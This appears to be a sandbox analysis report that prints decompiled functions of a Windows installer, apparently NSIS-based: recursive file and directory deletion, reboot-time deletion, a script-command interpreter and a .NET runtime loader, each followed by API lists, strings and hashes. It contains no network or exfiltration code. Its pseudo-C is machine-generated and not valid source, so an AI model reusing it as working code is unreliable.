                                                                                                                • API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
                                                                                                                • String ID: *.*$DEL$c:\agent\_work\66\s\src\libs\dutil\dirutil.cpp
                                                                                                                • API String ID: 1544372074-2145791747
                                                                                                                • Opcode ID: 39e523f0affbb444027dc2e52f7cfdbefbdffff49d53306203195e6c30dee3db
                                                                                                                • Instruction ID: 4382d2ce70b19b8dfc8484e377366898b381199b865675f9bbaeff6f8f17b49a
                                                                                                                • Opcode Fuzzy Hash: 39e523f0affbb444027dc2e52f7cfdbefbdffff49d53306203195e6c30dee3db
                                                                                                                • Instruction Fuzzy Hash: F3A12672C4163997DB3057E4AC04BDA7EA96F44764F2202A6ED14FB280D7799DC0CAD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406CC7, Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 59%
                                                                                                                			E00406CC7(void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				WCHAR* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAW _v608;
				signed int _t40;
				signed int _t50;
				signed int* _t54;
				signed int _t58;
				signed int _t61;
				signed int _t69;
				signed int _t71;
				void* _t73;
				signed int _t76;
				signed int _t78;
				WCHAR* _t93;
				short* _t98;

				_t93 = _a4;
				_t40 = E004067AA(__eflags, _t93);
				_v16 = _t40;
				if((_a8 & 0x00000008) != 0) {
					_t71 = DeleteFileW(_t93); // executed
					asm("sbb eax, eax");
					_t73 =  ~_t71 + 1;
					 *0x47eb68 =  *0x47eb68 + _t73;
					return _t73;
				}
				_t76 = _a8 & 0x00000001;
				__eflags = _t76;
				_v8 = _t76;
				if(_t76 == 0) {
					L5:
					E00406035(0x467470, _t93);
					__eflags = _t76;
					if(_t76 == 0) {
						E0040677D(_t93);
					} else {
						lstrcatW(0x467470, L"\\*.*");
					}
					__eflags =  *_t93;
					if( *_t93 != 0) {
						L10:
						lstrcatW(_t93, "\\");
						L11:
						_v12 =  &(_t93[lstrlenW(_t93)]);
						_t40 = FindFirstFileW(0x467470,  &_v608); // executed
						_a4 = _t40;
						__eflags = _t40 - 0xffffffff;
						if(_t40 == 0xffffffff) {
							_t78 = 0;
							__eflags = 0;
							L30:
							__eflags = _v8 - _t78;
							if(_v8 != _t78) {
								_t40 = 0;
								__eflags = 0;
								 *((short*)(_v12 - 2)) = 0;
							}
							goto L32;
						} else {
							goto L12;
						}
						do {
							L12:
							_t98 =  &(_v608.cFileName);
							_t54 = E00405D32(_t98, 0x3f);
							_t78 = 0;
							__eflags =  *_t54;
							if( *_t54 != 0) {
								__eflags = _v608.cAlternateFileName;
								if(_v608.cAlternateFileName != 0) {
									_t98 =  &(_v608.cAlternateFileName);
								}
							}
							__eflags =  *_t98 - 0x2e;
							if( *_t98 != 0x2e) {
								L19:
								E00406035(_v12, _t98);
								__eflags = _v608.dwFileAttributes & 0x00000010;
								if((_v608.dwFileAttributes & 0x00000010) == 0) {
									E004062CF(L"Delete: DeleteFile(\"%s\")", _t93);
									E00405E5C(_t93);
									_t58 = DeleteFileW(_t93); // executed
									_push(_t93);
									__eflags = _t58;
									if(_t58 != 0) {
										_push(0xfffffff2);
										E00404F9E();
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											_push(L"Delete: DeleteFile failed(\"%s\")");
											E004062CF();
											 *0x47eb68 =  *0x47eb68 + 1;
										} else {
											_push(L"Delete: DeleteFile on Reboot(\"%s\")");
											E004062CF();
											E00404F9E(0xfffffff1, _t93);
											E00406C94(_t93, _t78);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00406CC7(__eflags, _t93, _a8);
									}
								}
								goto L27;
							}
							_t69 =  *(_t98 + 2) & 0x0000ffff;
							__eflags = _t69 - _t78;
							if(_t69 == _t78) {
								goto L27;
							}
							__eflags = _t69 - 0x2e;
							if(_t69 != 0x2e) {
								goto L19;
							}
							__eflags =  *((intOrPtr*)(_t98 + 4)) - _t78;
							if( *((intOrPtr*)(_t98 + 4)) == _t78) {
								goto L27;
							}
							goto L19;
							L27:
							_t61 = FindNextFileW(_a4,  &_v608); // executed
							__eflags = _t61;
						} while (_t61 != 0);
						_t40 = FindClose(_a4);
						goto L30;
					}
					__eflags =  *0x467470 - 0x5c;
					if( *0x467470 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L32:
						__eflags = _v8;
						if(_v8 == 0) {
							L42:
							return _t40;
						}
						_push(_t93);
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E00406301();
							__eflags = _t40;
							if(_t40 == 0) {
								goto L42;
							}
							E0040674E(_t93);
							E004062CF(L"RMDir: RemoveDirectory(\"%s\")", _t93);
							E00405E5C(_t93);
							_t50 = RemoveDirectoryW(_t93); // executed
							_push(_t93);
							__eflags = _t50;
							if(_t50 != 0) {
								_push(0xffffffe5);
								_t40 = E00404F9E();
								goto L42;
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								_push(L"RMDir: RemoveDirectory failed(\"%s\")");
								L40:
								_t40 = E004062CF();
								 *0x47eb68 =  *0x47eb68 + 1;
								goto L42;
							}
							_push(L"RMDir: RemoveDirectory on Reboot(\"%s\")");
							E004062CF();
							E00404F9E(0xfffffff1, _t93);
							_t40 = E00406C94(_t93, 0);
							goto L42;
						}
						_push(L"RMDir: RemoveDirectory invalid input(\"%s\")");
						goto L40;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L32;
					}
					goto L5;
				}
			}



















                                                                                                                0x00406cd1
                                                                                                                0x00406cd5
                                                                                                                0x00406cde
                                                                                                                0x00406ce1
                                                                                                                0x00406ce4
                                                                                                                0x00406cec
                                                                                                                0x00406cee
                                                                                                                0x00406cef
                                                                                                                0x00000000
                                                                                                                0x00406cef
                                                                                                                0x00406cfe
                                                                                                                0x00406cfe
                                                                                                                0x00406d02
                                                                                                                0x00406d05
                                                                                                                0x00406d19
                                                                                                                0x00406d20
                                                                                                                0x00406d25
                                                                                                                0x00406d2d
                                                                                                                0x00406d3a
                                                                                                                0x00406d2f
                                                                                                                0x00406d35
                                                                                                                0x00406d35
                                                                                                                0x00406d3f
                                                                                                                0x00406d43
                                                                                                                0x00406d4f
                                                                                                                0x00406d55
                                                                                                                0x00406d57
                                                                                                                0x00406d61
                                                                                                                0x00406d6c
                                                                                                                0x00406d72
                                                                                                                0x00406d75
                                                                                                                0x00406d78
                                                                                                                0x00406e67
                                                                                                                0x00406e67
                                                                                                                0x00406e69
                                                                                                                0x00406e69
                                                                                                                0x00406e6c
                                                                                                                0x00406e71
                                                                                                                0x00406e71
                                                                                                                0x00406e73
                                                                                                                0x00406e73
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406d7e
                                                                                                                0x00406d7e
                                                                                                                0x00406d7e
                                                                                                                0x00406d89
                                                                                                                0x00406d8e
                                                                                                                0x00406d90
                                                                                                                0x00406d93
                                                                                                                0x00406d95
                                                                                                                0x00406d99
                                                                                                                0x00406d9b
                                                                                                                0x00406d9b
                                                                                                                0x00406d99
                                                                                                                0x00406d9e
                                                                                                                0x00406da2
                                                                                                                0x00406dc0
                                                                                                                0x00406dc4
                                                                                                                0x00406dc9
                                                                                                                0x00406dd0
                                                                                                                0x00406ded
                                                                                                                0x00406df5
                                                                                                                0x00406dfb
                                                                                                                0x00406e01
                                                                                                                0x00406e02
                                                                                                                0x00406e04
                                                                                                                0x00406e3d
                                                                                                                0x00406e3f
                                                                                                                0x00406e06
                                                                                                                0x00406e06
                                                                                                                0x00406e0a
                                                                                                                0x00406e29
                                                                                                                0x00406e2e
                                                                                                                0x00406e33
                                                                                                                0x00406e0c
                                                                                                                0x00406e0c
                                                                                                                0x00406e11
                                                                                                                0x00406e1b
                                                                                                                0x00406e22
                                                                                                                0x00406e22
                                                                                                                0x00406e0a
                                                                                                                0x00406dd2
                                                                                                                0x00406dd8
                                                                                                                0x00406dda
                                                                                                                0x00406de0
                                                                                                                0x00406de0
                                                                                                                0x00406dda
                                                                                                                0x00000000
                                                                                                                0x00406dd0
                                                                                                                0x00406da4
                                                                                                                0x00406da8
                                                                                                                0x00406dab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406db1
                                                                                                                0x00406db4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406db6
                                                                                                                0x00406dba
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406e44
                                                                                                                0x00406e4e
                                                                                                                0x00406e54
                                                                                                                0x00406e54
                                                                                                                0x00406e5f
                                                                                                                0x00000000
                                                                                                                0x00406e5f
                                                                                                                0x00406d45
                                                                                                                0x00406d4d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406d07
                                                                                                                0x00406d07
                                                                                                                0x00406d09
                                                                                                                0x00406e77
                                                                                                                0x00406e79
                                                                                                                0x00406e7c
                                                                                                                0x00406ef7
                                                                                                                0x00000000
                                                                                                                0x00406ef8
                                                                                                                0x00406e7e
                                                                                                                0x00406e7f
                                                                                                                0x00406e82
                                                                                                                0x00406e8b
                                                                                                                0x00406e90
                                                                                                                0x00406e92
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406e95
                                                                                                                0x00406ea0
                                                                                                                0x00406ea8
                                                                                                                0x00406eae
                                                                                                                0x00406eb4
                                                                                                                0x00406eb5
                                                                                                                0x00406eb7
                                                                                                                0x00406ef0
                                                                                                                0x00406ef2
                                                                                                                0x00000000
                                                                                                                0x00406ef2
                                                                                                                0x00406eb9
                                                                                                                0x00406ebd
                                                                                                                0x00406edc
                                                                                                                0x00406ee1
                                                                                                                0x00406ee1
                                                                                                                0x00406ee6
                                                                                                                0x00000000
                                                                                                                0x00406eed
                                                                                                                0x00406ebf
                                                                                                                0x00406ec4
                                                                                                                0x00406ece
                                                                                                                0x00406ed5
                                                                                                                0x00000000
                                                                                                                0x00406ed5
                                                                                                                0x00406e84
                                                                                                                0x00000000
                                                                                                                0x00406e84
                                                                                                                0x00406d0f
                                                                                                                0x00406d13
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406d13

                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                • lstrcatW.KERNEL32(00467470,\*.*), ref: 00406D35
                                                                                                                • lstrcatW.KERNEL32(?,00409838), ref: 00406D55
                                                                                                                • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                • FindNextFileW.KERNELBASE(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                Strings
                                                                                                                • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                • \*.*, xrefs: 00406D2F
                                                                                                                • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                • ptF, xrefs: 00406D1A
                                                                                                                • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                • API String ID: 2035342205-1650287579
                                                                                                                • Opcode ID: 0773e1bb02d94fce99ad1c6111755f8979c63676e37ea285c86d1b4844ce1413
                                                                                                                • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                • Opcode Fuzzy Hash: 0773e1bb02d94fce99ad1c6111755f8979c63676e37ea285c86d1b4844ce1413
                                                                                                                • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEA94C0, Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 165libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(mscoree.dll,3A83C854,?,?,?,?,00000000,6FF013E5,000000FF,?,6FEA9450,00000000,6FF1F8E0), ref: 6FEA94F4
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,6FF013E5,000000FF,?,6FEA9450), ref: 6FEA9695
                                                                                                                • GetLastError.KERNEL32(00000000,00000040,C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp,?,?,?,?,00000000,6FF013E5,000000FF,?,6FEA9450,00000000), ref: 6FEA952B
                                                                                                                  • Part of subcall function 6FEA5840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6FEA584A
                                                                                                                • GetProcAddress.KERNEL32(00000000,CorBindToRuntimeEx), ref: 6FEA9552
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00000000,6FF013E5,000000FF,?,6FEA9450), ref: 6FEA9561
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,6FF013E5,000000FF,?,6FEA9450), ref: 6FEA956E
                                                                                                                • CorBindToRuntimeEx.MSCOREE(v4.0.30319,00000000,00000002,6FF115F4,6FF11604,?,?,?,?,?,00000000,6FF013E5,000000FF,?,6FEA9450), ref: 6FEA95D1
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,6FF013E5,000000FF,?,6FEA9450), ref: 6FEA9607
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,6FF013E5,000000FF,?,6FEA9450), ref: 6FEA96E2
                                                                                                                Strings
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6FEA960D
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6FEA969B
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6FEA9574
                                                                                                                • v2.0.50727, xrefs: 6FEA95F2
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6FEA9503
                                                                                                                • v4.0.30319, xrefs: 6FEA95CC
                                                                                                                • CorBindToRuntimeEx, xrefs: 6FEA9549
                                                                                                                • mscoree.dll, xrefs: 6FEA94EF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Library$Free$ErrorLast$AddressBase::BindConcurrency::details::ContextIdentityLoadProcQueueRuntimeWork
                                                                                                                • String ID: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$CorBindToRuntimeEx$mscoree.dll$v2.0.50727$v4.0.30319
                                                                                                                • API String ID: 484818947-1696464217
                                                                                                                • Opcode ID: cf4c76eeefda8cb25c5f48eb300180072f15162db465543006d9553870d1ede1
                                                                                                                • Instruction ID: bdf23df5f143065a6781f91d82ddf82dfd8399824e635e2a15d410fc5df9512d
                                                                                                                • Opcode Fuzzy Hash: cf4c76eeefda8cb25c5f48eb300180072f15162db465543006d9553870d1ede1
                                                                                                                • Instruction Fuzzy Hash: 466105B0D00609EFCB04DFA4CD59BAEBBB5BF48314F20466CE425AB290DB766A41CB54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FED1C23, Relevance: 10.6, APIs: 7, Instructions: 140fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 6FED1C2D
                                                                                                                • PathIsUNCW.SHLWAPI(?,?,?,00000000), ref: 6FED1CE3
                                                                                                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6FED1D07
                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,00000040,?,00000268,6FED1850,?,00000040,?,00000040,00000104,00000000), ref: 6FED1C60
                                                                                                                  • Part of subcall function 6FED1BE1: GetLastError.KERNEL32(6FEAC43F,?,?,6FED1D18,6FEAC43F,?), ref: 6FED1BED
                                                                                                                  • Part of subcall function 6FED1497: PathStripToRootW.SHLWAPI(00000000,?,6FED1CDC,?,?,00000000), ref: 6FED14CB
                                                                                                                • CharUpperW.USER32(?), ref: 6FED1D35
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 6FED1D4D
                                                                                                                • FindClose.KERNEL32(00000000), ref: 6FED1D59
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Path$Find$CharCloseErrorFileFirstFullH_prolog3_InformationLastNameRootStripUpperVolume
                                                                                                                • String ID:
                                                                                                                • API String ID: 2323451338-0
                                                                                                                • Opcode ID: bafc8797bdc53d97803b9df84cbdd9de0d285b7677eb3b371322033b659d680d
                                                                                                                • Instruction ID: ae4d640de9979dbbbe014cdcc6256fe2773362d538c9f395fc18f031bb2c5e88
                                                                                                                • Opcode Fuzzy Hash: bafc8797bdc53d97803b9df84cbdd9de0d285b7677eb3b371322033b659d680d
                                                                                                                • Instruction Fuzzy Hash: 7241B7B1904615AFFB149BA4CD88FEE7B7CFF00319F34069DF41996590EB35AE428A60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406301, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00406301(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x466a20); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x466a20;
			}




                                                                                                                0x0040630c
                                                                                                                0x00406315
                                                                                                                0x00000000
                                                                                                                0x00406322
                                                                                                                0x00406318
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                • String ID: jF
                                                                                                                • API String ID: 2295610775-3349280890
                                                                                                                • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004015A0, Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E004015A0(void _a4, char _a7) {
				RECT* _v8;
				long _v12;
				short _v16;
				long _v20;
				long _v24;
				signed int _v28;
				struct _FILETIME _v36;
				signed int _v40;
				long _v44;
				signed int _v48;
				void _v52;
				int _v56;
				DWORD* _v60;
				signed char _v61;
				intOrPtr _v70;
				struct _SHFILEOPSTRUCTW _v96;
				char _v352;
				struct _WIN32_FIND_DATAW _v944;
				short _t504;
				signed int _t508;
				signed int _t514;
				signed int _t519;

				_t514 = 7;
				_t504 = memcpy( &_v52, _a4, _t514 << 2);
				_t519 = _v48;
				_v16 = _t504;
				 *0x40c0e4 =  &_v48;
				_t508 = _v52 + 0xfffffffe;
				_v8 = 0;
				if(_t508 > 0x47) {
					L430:
					 *0x47eb68 = _v8 +  *0x47eb68;
					L431:
					return 0;
				}
				switch( *((intOrPtr*)(_t508 * 4 +  &M004030F8))) {
					case 0:
						E004062CF(L"Jump: %d", _t519);
						return _v48;
					case 1:
						E0040145C(__edx, 0) = E004062CF(L"Aborting: \"%s\"", __eax);
						_pop(__ecx);
						_pop(__ecx);
						_push(0);
						_push(_v48);
						goto L4;
					case 2:
						 *0x476a74 =  *0x476a74 + 1;
						__eflags = _v16;
						if(_v16 != 0) {
							PostQuitMessage(0);
						}
						goto L5;
					case 3:
						_t15 = E0040137E(__edx) - 1; // -1
						__esi = _t15;
						__eax = E004062CF(L"Call: %d", _t15);
						_pop(__ecx);
						_pop(__ecx);
						_push(0);
						return E0040139D(_t15);
					case 4:
						E0040145C(__edx, 0) = E004062CF(L"detailprint: %s", __eax);
						_pop(__ecx);
						_pop(__ecx);
						_push(0);
						_push(_v48);
						goto L10;
					case 5:
						__ecx = 0;
						__esi = E00401446(0);
						__eax = E004062CF(L"Sleep(%d)", __esi);
						_pop(__ecx);
						_pop(__ecx);
						__eflags = __esi - 1;
						if(__esi <= 1) {
							__esi = 0;
							__esi = 1;
							__eflags = 1;
						}
						Sleep(__esi);
						goto L430;
					case 6:
						_push(L"BringToFront");
						__eax = E004062CF();
						_pop(__ecx);
						__eax = SetForegroundWindow(_v16);
						goto L430;
					case 7:
						__eax =  *0x476a80;
						__esi = ShowWindow;
						__eflags = __eax;
						if(__eax != 0) {
							__eax = ShowWindow(__eax, __ecx);
							__edx = _v48;
						}
						__eax =  *0x476a6c;
						__eflags = __eax - __ebx;
						if(__eax != __ebx) {
							__eax = ShowWindow(__eax, __edx);
						}
						goto L430;
					case 8:
						__eax = E0040145C(__edx, 0xfffffff0);
						_push(_v44);
						__esi = __eax;
						__eax = E004062CF(L"SetFileAttributes: \"%s\":%08X", __esi);
						__eax = SetFileAttributesW(__esi, _v44);
						__eflags = __eax;
						if(__eax != 0) {
							goto L430;
						} else {
							_v8 = 1;
							_push(L"SetFileAttributes failed.");
							goto L26;
						}
					case 9:
						__eax = E0040145C(__edx, 0xfffffff0);
						_push(_v44);
						_a4 = __eax;
						__eax = E004062CF(L"CreateDirectory: \"%s\" (%d)", __eax);
						__esi = E00405D85(_a4);
						__eflags = __esi;
						if(__esi == 0) {
							L37:
							_push(0x4100f0);
							__eflags = _v44 - __ebx;
							if(_v44 == __ebx) {
								_push(0xfffffff5);
								goto L10;
							} else {
								_push(0xffffffe6);
								E00404F9E() = E00406035(0x4d70b0, _a4);
								__eax = SetCurrentDirectoryW(_a4);
								goto L430;
							}
						} else {
							goto L29;
						}
						do {
							L29:
							__esi = E00405D32(__esi, 0x5c);
							__edi =  *__esi & 0x0000ffff;
							__eax = 0;
							 *__esi = __ax; // executed
							__eax = CreateDirectoryW(_a4, __ebx); // executed
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E004062CF(L"CreateDirectory: \"%s\" created", _a4);
								L35:
								_pop(__ecx);
								_pop(__ecx);
								goto L36;
							}
							__eax = GetLastError();
							__eflags = __eax - 0xb7;
							if(__eax == 0xb7) {
								__eax = GetFileAttributesW(_a4); // executed
								__eflags = __al & 0x00000010;
								if((__al & 0x00000010) != 0) {
									goto L36;
								} else {
									__eax = E004062CF(L"CreateDirectory: can\'t create \"%s\" - a file already exists", _a4);
									_v8 =  &(_v8->left);
									goto L35;
								}
							} else {
								_push(GetLastError());
								__eax = E004062CF(L"CreateDirectory: can\'t create \"%s\" (err=%d)", _a4);
								_v8 =  &(_v8->left);
							}
							L36:
							 *__esi = __di;
							__esi =  &(__esi[1]);
							__eflags = __di - __bx;
						} while (__di != __bx);
						goto L37;
					case 0xa:
						__esi = E0040145C(__edx, 0);
						__eax = E00406301(__eax);
						__eflags = __eax;
						if(__eax == 0) {
							_push(_v40);
							__eax = E004062CF(L"IfFileExists: file \"%s\" does not exist, jumping %d", __esi);
							goto L44;
						} else {
							_push(_v44);
							__eax = E004062CF(L"IfFileExists: file \"%s\" exists, jumping %d", __esi);
							goto L42;
						}
					case 0xb:
						__eax = __edx;
						__eflags = _v40;
						if(_v40 != 0) {
							__ecx =  *(0x47eb20 + __eax * 4);
							 *(0x47eb60 + __eax * 4) =  *(0x47eb20 + __eax * 4);
						} else {
							__ecx =  *(0x47eb60 + __eax * 4);
							 *(0x47eb20 + __eax * 4) =  *(0x47eb60 + __eax * 4);
							__ecx = 0;
							__ecx = 1;
							__eax = E00401446(1);
							__ecx = _v48;
							 *(0x47eb60 + _v48 * 4) = __eax;
						}
						goto L430;
					case 0xc:
						__esi = _v40;
						__esi = 0x47eb60 + _v40 * 4;
						__ecx =  *__esi;
						__eax = 0;
						__eflags = __ecx;
						__eax = 0 | __ecx == 0x00000000;
						 *__esi = __ecx;
						return __eax;
					case 0xd:
						_push( *((intOrPtr*)(0x47eb60 + __ecx * 4)));
						goto L428;
					case 0xe:
						__esi = E0040145C(__edx, 0xffffffd0);
						_a4 = E0040145C(__edx, 0xffffffdf);
						__edi = E0040145C(__edx, 0x13);
						__eax = E004062CF(L"Rename: %s", __edi);
						_pop(__ecx);
						_pop(__ecx);
						__eax = MoveFileW(__esi, _a4);
						__eflags = __eax;
						if(__eax == 0) {
							__eflags = _v40;
							if(_v40 == 0) {
								L50:
								_push(__edi);
								_push(L"Rename failed: %s");
								goto L51;
							}
							__eax = E00406301(__esi);
							__eflags = __eax;
							if(__eax == 0) {
								goto L50;
							} else {
								E00406C94(__esi, _a4) = E00404F9E(0xffffffe4, 0x4100f0);
								_push(__edi);
								_push(L"Rename on reboot: %s");
								goto L52;
							}
						} else {
							_push(0x4100f0);
							_push(0xffffffe3);
							goto L10;
						}
					case 0xf:
						__esi = E0040145C(__edx, 0);
						__eax =  &_a4;
						__eax = GetFullPathNameW(__esi, 0x2004, __edi,  &_a4);
						__eflags = __eax;
						if(__eax == 0) {
							L58:
							__eax = 0;
							__eflags = 0;
							 *__edi = __ax;
							_v8 = 1;
							L59:
							__eflags = _v40 - __ebx;
							if(_v40 == __ebx) {
